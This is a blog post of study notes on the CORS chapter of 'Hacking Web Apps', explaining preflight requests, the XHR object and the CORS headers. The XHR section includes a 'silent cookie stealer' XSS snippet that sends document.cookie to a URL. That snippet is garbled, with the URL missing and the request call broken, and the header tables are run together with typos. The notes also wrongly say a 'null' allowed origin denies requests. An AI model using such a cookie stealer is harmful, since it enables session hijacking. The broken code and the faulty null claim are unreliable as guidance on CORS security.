Notes from "Hacking Web Apps" Book CORS chapter.
3 min read

Notes from "Hacking Web Apps" Book CORS chapter.


This is just my understanding of what I read throughout the book. It may not be perfect information, and I advise you to do your own research on anything that is not properly understood or seems "off".

Preflight requests

A preflight request is a small request that is sent by the browser before the actual request (this is most commonly used with the XHR Object). It contains information like which HTTP method is used, as well as if any custom HTTP headers are present.

XHR Object

The XML HTTP Request object allows for asynchronous background web requests and also non-GET methods (such as POST requests). This can of course be very handy when making certain silent web hacking payloads such as an XSS silent cookie stealer.

var xhr = new XMLHttpRequest();
var url_to_use = "" + document.cookie;'GET', url_to_use, true);

CORS (Cross Origin Resource Sharing)

Web developers feel the need to push the boundaries of certain browser capabilities, to allow the webapps to come as close as possible to a "native" application through the browser.

One of the capabilities is the Same Origin Policy, which was also one of the few security mechanisms implemented into the first browsers. Developers often have legitimate reasons for wanting to relax the Same Origin Policy, for example if they want to be able to spread a site across multiple domains or just make interactions between unrelated domains possible.

Browser request CORS headers (3)

HeaderWhat does it do?OriginTellllThe scheme/host/port of the resource making the initial request. The sharing to this should be granted by the server. The whole point of this header is to ensure the request is coming from an uncompromised browser, and the value is set exactly by the browser, and can not be modified by HTML, JS or plugins.Access-Control-Request-MethodThis header is used in preflight requests to find out whether or not the server will follow the methods that XHR wants to use.Access-Control-Requetst-HeadersThis header is also used in preflight requests to find out if the server will follow any additional headers that XHR wants to use.

Server request CORS headers (6)

HeaderWhat does it do?Access-Control-Allow-CredentialsThis header can either be "true" or "false", and by default, the browser will not submit authentication values such as cookies, basic auth strings or client SSL certificates across origins. This header is basically used to ensure that malicious content can not leak sensitive information.Access-Control-Allow-HeadersThis determines the headers that a client request can use, there are some immutable headers such as the origin or host. This header basically applies to the use of Content-Type and custom X-headers.Access-Control-Allow-MethodsThis header restricts and declares what methods can be used by the browser. It should be used to allow only the completely necessary request types, which a lot of the time, is just GET.Access-Control-Allow-OriginThis header declares what origins the server allows the browser to share it's response with. This can be an explicit server, a wildcard (*) or "null" (which denies requests). The wildcard will always prevent credentials and other authentication information from being shared, regardless of the ACAC (Access-Control-Allow-Credentials).Access-Control-Expose-HeadersThis is a list of headers that the browser can make visible to the client, for example the javascript could pull the headers exposed by a XHR request.Access-Control-Max-AgeThis is the amount of time in seconds that the response to a preflight request can be cached. Longer times increase the potential exposure of overly permissive controls from a preflight request.


Sharing resources cross-origin has to be allowed by the server, and access to responses from the server will always be restricted to the Same Origin Policy unless the response specifies otherwise with a (or multiple) CORS header(s). These headers are known as Access-Control-Headers, and are returned in the servers response. The clients browser also sends certain headers to facilitate security. Furthermore, a browser may use a preflight request in certain situations to establish the CORS policy, this is generally used for the XHR Object.